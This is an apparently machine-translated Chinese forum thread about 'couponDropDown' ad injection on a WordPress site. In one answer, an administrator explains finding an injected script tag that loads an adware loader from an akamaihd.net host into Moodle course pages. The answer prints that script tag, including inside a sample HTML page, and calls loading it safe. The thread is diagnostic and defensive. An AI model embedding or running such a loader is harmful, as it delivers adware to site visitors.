广告couponDropDown

Question

我遇到了有关着名的现场广告恶意软件的问题，特别是Ad couponDropDown。

我知道这些广告通常是通过计算机上的恶意软件或浏览器附加组件创建的。但是，我的硬盘和我的Firefox都很干净，但广告仍然显示在我很久以前创建的特定网站上。

它作为带有随机生成类的html标记插入到两个div之间。

网站正在wordpress上运行，具有iThemes安全性（以前更好的安全性） - 最新更新，没有高风险问题。 当我下载并更新插件时，广告本身就消失了，但是通过优惠券|留下了空白容器和＆＃34;广告靠近＆＃34;链接。

现在我通过css隐藏了中心标签。

我感谢任何回应。

链接到网站（它是斯洛文尼亚语）： http://www.grasshopper.si/

Answer 1

我遇到了同样的问题。突然之间，我管理的网站充满了来自＆＃34; couponDropDown＆＃34;的横幅。我的问题不在于计算机中的本地病毒。

这是我发现的，以及我是如何解决的：

• 正如我之前提到的，我管理一个Moodle网站，其他用户管理课程。
• 在由同一个人管理的两个课程中，couponDropDown噩梦出现了。但不是在其他人。问题仅限于某个人的某些课程。
• 显然，这是由该人装载的内容，但它并不明显。

• 在WYSIWYG编辑器中查看HTML源代码后，找到了一些具有以下结构的脚本标签：

  <p>Some HTML over here</p>
  <script src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=10368"></script>

• 在整个过程中，找到了该脚本。这会导致创建一些iframe，并加载http://advertising-support.com/中的一些内容。

• 最后，我只是认为管理这两门课程的人的计算机被感染并且（这里很重要）在编辑器中引入该代码而没有被注意到，并在网站中加载该脚本。那些剧本最终加载了大量的横幅等。非常聪明。
• 解决方案：遍布这两个课程内容，寻找从akamaihd.net加载的脚本。

我猜你可能遇到过同样的问题。也许您在后端使用WYSIWYG编辑器，并且该脚本附加到其他内容而不会注意到它。

您可以分析您的数据库以查找该脚本（截至2014年11月5日，它仍在那里：）

如果您感到好奇，只需将此代码C＆amp; P放在html文件中，然后使用本地服务器加载。使用开发人员工具，只需浏览引入的新HTML。您将看到一些iframe，加载falsh的对象，一些网络流量等，但没有显示实际内容：

＆＃13;

＆＃13;

<!DOCTYPE html>
<html>
<head>
    <meta charset="utf8">
    <title>couponDropDown test</title>
</head>
<body>
<p>Some HTML over here</p>
<script src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=10368"></script>
</body>

＆＃13;

＆＃13;

＆＃13;

举个例子，我觉得它很有用。据我所知，这是安全的！希望它有所帮助！